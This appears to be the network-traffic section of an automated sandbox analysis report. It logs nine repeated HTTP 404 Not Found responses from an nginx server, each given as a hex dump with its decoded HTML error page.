                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:09:27 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:09:30 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:09:32 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:10:16 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:10:16 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:10:19 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:10:22 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:10:25 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:10:37 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
